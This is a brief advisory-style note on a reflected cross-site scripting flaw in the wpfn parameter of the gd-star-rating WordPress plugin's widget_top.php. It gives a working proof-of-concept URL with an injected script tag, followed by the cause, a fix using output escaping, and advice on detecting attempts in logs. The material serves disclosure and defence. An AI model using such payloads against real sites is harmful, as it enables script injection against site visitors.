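http://www.example.com/wp-content/plugins/gd-star-rating/widgets/widget_top.php?wpfn="><script>alert("XSS");</script>

The URL above is a reflected cross-site scripting (XSS) proof of concept against the `wpfn` query parameter of `widgets/widget_top.php` in the gd-star-rating WordPress plugin. The leading `">` closes an attribute value and its tag, so the value appears to be echoed into an HTML attribute without output escaping; the affected plugin version is not stated here. The fix is to escape the parameter for its output context when it is printed (in WordPress, `esc_attr()` for attribute values) and to reject values that do not match the expected format. For detection, review web server logs for requests to `widget_top.php` in which `wpfn` contains quotes or angle brackets, raw or URL-encoded.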